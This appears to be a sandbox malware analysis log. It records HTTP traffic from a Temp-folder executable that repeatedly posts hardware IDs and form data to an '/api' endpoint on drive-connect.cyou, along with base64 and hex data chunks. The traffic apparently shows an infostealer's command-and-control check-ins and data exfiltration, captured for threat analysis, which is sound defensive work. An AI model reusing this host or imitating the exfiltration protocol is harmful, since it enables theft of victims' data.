                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 45 56 6b 4f 43 69 33 44 43 4d 52 30 73 69 71 46 47 66 72 4c 6e 7a 6c 74 41 42 75 2b 39 2b 38 37 69 72 48 79 45 58 58 4e 2b 48 75 56 53 38 30 49 76 64 56 61 56 79 55 6a 61 67 44 4a 72 6c 67 54 65 69 30 42 57 2b 36 2b 4c 44 6b 4a 4d 7a 57 44 38 56 33 2f 4b 5a 62 4b 48 39 38 74 31 68 71 48 4e 48 48 71 78 74 68 37 43 56 36 36 4c 73 46 5a 2f 4c 44 74 4f 34 6d 77 73 31 4a 32 6a 37 68 34 30 34 68 4e 69 6a 37 46 43 31 63 33 64 58 76 51 79 62 4f 4a 32 2f 73 6c 77 74 78 38 59 32 73 70 44 4f 4c 78 30 4f 61 59 61 58 68 57 53 77 30 49 76 39 55 63 52 6e 55 78 71 34 52 59 4f 41 74 64 65 6d 34 43 57 44 2b 77 62 50 74 4c 64 6e 53 53 74 77 72 37 36 59 53 5a 44 67 38 74 77 77 6a 4b 73 72 61 76 67 30 6b 31 43 4e 33 34 62 38 65 49 4f 65 44 71 71 6f 74 78 34 41 58 6d 6a 4c 6c
                                                                                                                                                                                                                                            Data Ascii: EVkOCi3DCMR0siqFGfrLnzltABu+9+87irHyEXXN+HuVS80IvdVaVyUjagDJrlgTei0BW+6+LDkJMzWD8V3/KZbKH98t1hqHNHHqxth7CV66LsFZ/LDtO4mws1J2j7h404hNij7FC1c3dXvQybOJ2/slwtx8Y2spDOLx0OaYaXhWSw0Iv9UcRnUxq4RYOAtdem4CWD+wbPtLdnSStwr76YSZDg8twwjKsravg0k1CN34b8eIOeDqqotx4AXmjLl
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 51 32 39 31 6c 6e 45 4e 37 46 70 42 45 6d 72 32 42 2b 39 2f 68 51 49 4d 33 41 76 4f 6f 70 33 59 42 51 6c 43 43 6c 34 56 42 6b 5a 32 54 37 57 6d 4d 54 31 73 47 6b 45 32 66 74 4c 6e 37 71 73 51 42 6f 36 73 79 33 34 69 76 46 7a 30 37 65 50 4f 44 69 57 79 41 35 4b 37 63 61 49 78 76 43 6a 66 64 62 53 63 59 56 4f 38 36 43 53 48 2b 32 31 50 50 74 4a 6f 75 59 44 39 59 36 36 65 35 54 49 6a 59 6f 2f 56 31 6f 45 4e 48 4a 6f 78 4a 6a 35 79 46 38 36 72 6b 4d 62 50 4c 4c 73 4f 6b 6c 78 4d 39 48 6d 6e 65 6c 34 55 52 6b 5a 32 54 53 51 32 67 53 33 49 32 77 56 58 2b 68 4a 33 57 76 34 45 68 73 38 63 75 31 37 79 62 4b 78 6b 66 66 4d 65 48 6e 57 69 49 38 4b 2f 4e 52 59 68 50 65 77 61 45 52 5a 2b 41 73 63 75 43 7a 44 53 43 32 6a 62 54 79 61 70 4f 41 66 74 6b 76 38 76 5a 51 5a
                                                                                                                                                                                                                                            Data Ascii: Q291lnEN7FpBEmr2B+9/hQIM3AvOop3YBQlCCl4VBkZ2T7WmMT1sGkE2ftLn7qsQBo6sy34ivFz07ePODiWyA5K7caIxvCjfdbScYVO86CSH+21PPtJouYD9Y66e5TIjYo/V1oENHJoxJj5yF86rkMbPLLsOklxM9Hmnel4URkZ2TSQ2gS3I2wVX+hJ3Wv4Ehs8cu17ybKxkffMeHnWiI8K/NRYhPewaERZ+AscuCzDSC2jbTyapOAftkv8vZQZ
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 55 5a 41 53 61 6c 65 38 31 62 66 49 33 65 75 47 7a 48 6e 75 34 30 76 33 7a 61 73 7a 4d 44 34 4a 35 35 75 31 58 49 44 38 6f 39 31 42 75 48 4d 6a 43 71 42 78 76 36 6a 4a 7a 36 4c 38 44 61 50 50 43 74 66 67 6d 78 64 4a 4b 79 43 75 6c 71 42 77 6a 4a 32 53 76 46 46 55 62 79 74 32 73 57 56 66 33 49 32 2f 6b 74 51 51 67 35 34 4f 71 71 69 33 48 67 42 65 61 50 2b 72 76 58 79 73 2b 4c 66 74 5a 5a 68 58 66 7a 4b 6b 66 62 4f 73 67 66 2b 6d 35 44 57 72 37 7a 4c 6e 6a 4c 63 50 48 54 4d 68 35 71 36 5a 62 50 48 39 38 74 33 31 6b 44 74 54 64 37 77 51 6f 2b 47 42 2b 34 2f 68 51 49 50 7a 48 76 4f 34 74 78 38 5a 4b 33 44 54 6b 36 56 30 6b 4d 43 44 38 58 57 55 64 31 38 69 69 48 33 54 72 4b 33 62 6a 73 51 52 74 75 49 50 7a 37 54 4b 4c 6d 41 2f 72 4e 4f 76 6f 57 7a 4a 2f 4f 37
                                                                                                                                                                                                                                            Data Ascii: UZASale81bfI3euGzHnu40v3zaszMD4J55u1XID8o91BuHMjCqBxv6jJz6L8DaPPCtfgmxdJKyCulqBwjJ2SvFFUbyt2sWVf3I2/ktQQg54Oqqi3HgBeaP+rvXys+LftZZhXfzKkfbOsgf+m5DWr7zLnjLcPHTMh5q6ZbPH98t31kDtTd7wQo+GB+4/hQIPzHvO4tx8ZK3DTk6V0kMCD8XWUd18iiH3TrK3bjsQRtuIPz7TKLmA/rNOvoWzJ/O7
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 31 38 36 70 48 57 33 74 4d 6e 44 76 75 77 4d 67 74 6f 32 30 38 6d 71 54 67 47 7a 4e 4c 2b 2f 68 55 44 49 30 4a 66 52 43 62 67 79 61 67 2b 38 4b 59 66 42 67 49 66 6d 6f 48 32 66 6e 67 36 71 71 4c 63 65 41 46 35 6f 2f 37 4f 42 62 49 6a 45 32 38 6c 4a 73 45 39 50 45 71 78 4e 6c 34 53 52 39 36 4c 30 4c 62 50 50 4b 73 4f 55 75 77 73 35 47 31 58 6d 72 70 6c 73 38 66 33 79 33 64 58 67 66 31 73 44 76 42 43 6a 34 59 48 37 6a 2b 46 41 67 39 4d 4f 32 36 69 44 4e 78 45 72 63 4d 2b 44 6d 56 79 63 77 49 50 46 51 62 42 7a 52 78 4b 34 64 59 2b 73 72 66 2b 4b 37 44 6d 61 34 67 2f 50 74 4d 6f 75 59 44 2f 6f 69 36 4f 70 62 5a 43 42 71 37 68 52 6b 45 4a 71 56 37 78 42 71 35 53 64 35 34 72 73 41 5a 66 7a 48 74 75 6f 69 32 63 68 50 33 53 76 33 35 6c 55 68 4d 79 66 33 55 47 55
                                                                                                                                                                                                                                            Data Ascii: 186pHW3tMnDvuwMgto208mqTgGzNL+/hUDI0JfRCbgyag+8KYfBgIfmoH2fng6qqLceAF5o/7OBbIjE28lJsE9PEqxNl4SR96L0LbPPKsOUuws5G1Xmrpls8f3y3dXgf1sDvBCj4YH7j+FAg9MO26iDNxErcM+DmVycwIPFQbBzRxK4dY+srf+K7Dma4g/PtMouYD/oi6OpbZCBq7hRkEJqV7xBq5Sd54rsAZfzHtuoi2chP3Sv35lUhMyf3UGU
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 42 52 33 33 32 41 68 39 6f 5a 49 61 2b 37 4b 6f 2b 6b 38 77 4d 31 44 79 77 65 6c 76 67 68 32 62 58 61 6c 42 6e 78 63 78 66 4c 68 57 32 65 68 65 45 44 32 2b 42 34 67 6f 4a 2f 39 71 6a 69 4c 6d 41 2b 64 4f 76 66 30 57 69 63 70 4a 37 42 71 58 54 76 4d 78 36 67 4c 59 66 59 76 4f 61 48 34 42 79 43 67 39 50 50 6a 4c 64 44 52 57 64 63 70 34 71 5a 6a 61 6e 38 38 74 77 77 6a 4b 64 6e 44 6f 52 78 77 38 47 31 65 2b 62 49 50 63 50 2f 61 76 4b 70 6b 69 38 59 50 67 6d 71 72 70 6c 67 31 66 33 79 6e 42 6a 68 4a 69 5a 72 2f 53 58 6d 76 4f 54 6e 35 2b 46 41 79 74 6f 32 68 71 6e 4b 4c 68 30 7a 49 4b 2b 50 6c 53 69 64 34 47 73 6c 7a 65 52 48 63 32 72 34 6c 57 4f 59 36 64 4f 6d 76 47 53 7a 74 7a 72 33 6b 4c 64 32 41 41 5a 6f 32 70 62 35 6c 5a 48 64 6b 79 42 6f 6a 42 4a 71 56
                                                                                                                                                                                                                                            Data Ascii: BR332Ah9oZIa+7Ko+k8wM1Dywelvgh2bXalBnxcxfLhW2eheED2+B4goJ/9qjiLmA+dOvf0WicpJ7BqXTvMx6gLYfYvOaH4ByCg9PPjLdDRWdcp4qZjan88twwjKdnDoRxw8G1e+bIPcP/avKpki8YPgmqrplg1f3ynBjhJiZr/SXmvOTn5+FAyto2hqnKLh0zIK+PlSid4GslzeRHc2r4lWOY6dOmvGSztzr3kLd2AAZo2pb5lZHdkyBojBJqV
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 46 79 5a 71 47 68 53 48 61 34 6c 65 47 6b 61 74 6d 41 46 35 70 2b 35 76 52 4f 49 6a 77 79 39 42 4e 64 49 76 33 44 71 42 70 77 38 54 64 32 30 59 59 64 59 2f 62 44 74 50 77 37 69 34 34 50 31 58 6d 39 33 78 78 73 66 78 75 35 46 48 74 63 67 6f 32 61 47 47 6a 76 4a 32 2f 2b 39 53 39 75 2f 38 79 6c 2b 6a 33 45 67 41 47 61 50 36 57 2b 44 6d 70 2f 49 4f 59 55 4f 30 79 49 6c 76 70 49 4d 62 46 79 5a 71 47 68 53 48 61 34 6c 65 47 6b 61 74 6d 41 46 35 70 2b 35 76 52 4f 49 6a 77 79 39 42 4e 64 49 76 33 44 71 42 70 77 38 54 64 32 6f 4a 59 2b 51 63 62 7a 70 75 6b 6b 78 63 64 5a 79 33 6d 72 70 6c 4e 6b 5a 78 32 33 48 43 4d 6a 6c 49 32 33 57 7a 36 68 46 58 72 68 74 67 39 32 36 59 43 55 35 43 33 4b 31 6c 2f 4e 4e 71 72 49 61 67 56 2f 61 72 64 53 49 30 53 49 67 2b 38 66 64
                                                                                                                                                                                                                                            Data Ascii: FyZqGhSHa4leGkatmAF5p+5vROIjwy9BNdIv3DqBpw8Td20YYdY/bDtPw7i44P1Xm93xxsfxu5FHtcgo2aGGjvJ2/+9S9u/8yl+j3EgAGaP6W+Dmp/IOYUO0yIlvpIMbFyZqGhSHa4leGkatmAF5p+5vROIjwy9BNdIv3DqBpw8Td2oJY+QcbzpukkxcdZy3mrplNkZx23HCMjlI23Wz6hFXrhtg926YCU5C3K1l/NNqrIagV/ardSI0SIg+8fd
                                                                                                                                                                                                                                            2024-12-09 20:09:16 UTC1369INData Raw: 73 2b 6a 6c 32 2b 38 32 39 37 57 71 46 67 46 65 61 59 61 58 4c 54 69 4d 76 4a 37 63 61 49 78 43 61 6c 65 38 57 64 4f 59 77 65 71 4f 2f 45 6d 65 34 30 76 33 7a 61 74 32 41 46 34 6c 33 70 66 51 63 66 48 39 6a 2b 56 6c 69 48 39 54 4f 76 51 6c 67 34 6a 5a 36 71 49 59 32 54 65 72 4b 6f 2b 6c 6f 2b 73 31 4c 7a 43 7a 6d 39 6c 73 61 41 51 6e 6c 55 33 4d 66 6d 4f 47 6f 46 6d 72 66 48 6b 37 2b 76 78 67 69 33 73 36 6c 36 57 71 46 67 46 65 61 59 61 58 4c 54 69 4d 76 4a 37 56 34 5a 42 48 57 6a 62 42 56 66 36 45 32 4f 62 66 72 52 69 44 71 6a 65 75 71 62 63 6a 53 58 64 77 36 38 2b 55 62 47 67 45 4a 35 56 4e 7a 48 35 6a 38 6f 68 39 77 39 43 4e 70 36 49 59 32 54 65 72 4b 6f 2b 6c 6f 37 76 6f 4e 36 79 2f 6d 35 6c 49 6a 66 32 71 33 54 43 4e 45 6d 75 43 39 48 48 62 69 59 6c
                                                                                                                                                                                                                                            Data Ascii: s+jl2+8297WqFgFeaYaXLTiMvJ7caIxCale8WdOYweqO/Eme40v3zat2AF4l3pfQcfH9j+VliH9TOvQlg4jZ6qIY2TerKo+lo+s1LzCzm9lsaAQnlU3MfmOGoFmrfHk7+vxgi3s6l6WqFgFeaYaXLTiMvJ7V4ZBHWjbBVf6E2ObfrRiDqjeuqbcjSXdw68+UbGgEJ5VNzH5j8oh9w9CNp6IY2TerKo+lo7voN6y/m5lIjf2q3TCNEmuC9HHbiYl


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.649879172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:17 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=C3379N2N0NFHUMX0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 12846
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:17 UTC12846OUTData Raw: 2d 2d 43 33 33 37 39 4e 32 4e 30 4e 46 48 55 4d 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 43 33 33 37 39 4e 32 4e 30 4e 46 48 55 4d 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 33 33 37 39 4e 32 4e 30 4e 46 48 55 4d 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 43 33 33
                                                                                                                                                                                                                                            Data Ascii: --C3379N2N0NFHUMX0Content-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--C3379N2N0NFHUMX0Content-Disposition: form-data; name="pid"2--C3379N2N0NFHUMX0Content-Disposition: form-data; name="lid"FATE99--test--C33
                                                                                                                                                                                                                                            2024-12-09 20:09:18 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:18 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=elie5t8kqm0oibhvfb3r4srhll; expires=Fri, 04-Apr-2025 13:55:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rdxrI14wOR3GuKOMTVAxvbiIWDh4k3qkFk28xHQAgF9lgpuyLVPJec8pJfG5d4su%2BPLEmDPRf%2FBT1Uq3e0Z3cP3CgT%2FAbDt0R0NfWfoo3fN1jol1G3wQEvlahBKS70O5Wa4yt98%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a1cfd8c718c8-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1707&rtt_var=645&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13786&delivery_rate=1689814&cwnd=148&unsent_bytes=0&cid=3ab094c9ba816182&ts=930&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.649884172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:20 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=OA3UZLBRYNT4BHI
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 15086
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:20 UTC15086OUTData Raw: 2d 2d 4f 41 33 55 5a 4c 42 52 59 4e 54 34 42 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4f 41 33 55 5a 4c 42 52 59 4e 54 34 42 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 41 33 55 5a 4c 42 52 59 4e 54 34 42 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 4f 41 33 55 5a 4c
                                                                                                                                                                                                                                            Data Ascii: --OA3UZLBRYNT4BHIContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--OA3UZLBRYNT4BHIContent-Disposition: form-data; name="pid"2--OA3UZLBRYNT4BHIContent-Disposition: form-data; name="lid"FATE99--test--OA3UZL
                                                                                                                                                                                                                                            2024-12-09 20:09:21 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=5va2ru2ch3akd6ari4h74sk02i; expires=Fri, 04-Apr-2025 13:55:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35UAUrI1JaxADVzBER2Px4We8zu93oZNvSSvDsE5ixswRFvVbIqmQLHVUIS6%2BttxYxns5gzhYIRKpgRYQy2lB5vOkFC9dW6XoxZbN27aWxRSmjIAWW3d4lQV84b%2F8yFeyDPSJw8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a1de694f7c7e-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2280&min_rtt=1818&rtt_var=1606&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2847&recv_bytes=16025&delivery_rate=529177&cwnd=228&unsent_bytes=0&cid=a61eed946666a23e&ts=1042&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.649891172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:22 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1LLJM2XTEHJY7XB68
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 19956
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:22 UTC15331OUTData Raw: 2d 2d 31 4c 4c 4a 4d 32 58 54 45 48 4a 59 37 58 42 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 31 4c 4c 4a 4d 32 58 54 45 48 4a 59 37 58 42 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 4c 4c 4a 4d 32 58 54 45 48 4a 59 37 58 42 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d
                                                                                                                                                                                                                                            Data Ascii: --1LLJM2XTEHJY7XB68Content-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--1LLJM2XTEHJY7XB68Content-Disposition: form-data; name="pid"3--1LLJM2XTEHJY7XB68Content-Disposition: form-data; name="lid"FATE99--test--
                                                                                                                                                                                                                                            2024-12-09 20:09:22 UTC4625OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f
                                                                                                                                                                                                                                            Data Ascii: +?2+?2+?o?Mp5p_o
                                                                                                                                                                                                                                            2024-12-09 20:09:23 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:23 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=2smev5k0v61vhkvk02tuj0og50; expires=Fri, 04-Apr-2025 13:56:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDF3VwVsGsHqZlhx%2F5elw54f%2BwzP8hgBICPpJGZ%2FFWsZwIQm8vYtRa610b0cIssosDcoufUXX7wWgyCTCC4j6A4MVvszICmeN6Q4TzlBcfD4Wgh5otqGI6I2d9O4DG9gxW6Br4c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a1ee8c480f7b-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1596&rtt_var=607&sent=16&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=20919&delivery_rate=1791411&cwnd=205&unsent_bytes=0&cid=788f317d169f81fa&ts=916&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.649899172.67.139.784435564C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:25 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=PMR5V0MA4F2ER9VZ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1217
                                                                                                                                                                                                                                            Host: drive-connect.cyou
                                                                                                                                                                                                                                            2024-12-09 20:09:25 UTC1217OUTData Raw: 2d 2d 50 4d 52 35 56 30 4d 41 34 46 32 45 52 39 56 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 50 4d 52 35 56 30 4d 41 34 46 32 45 52 39 56 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4d 52 35 56 30 4d 41 34 46 32 45 52 39 56 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 50 4d 52
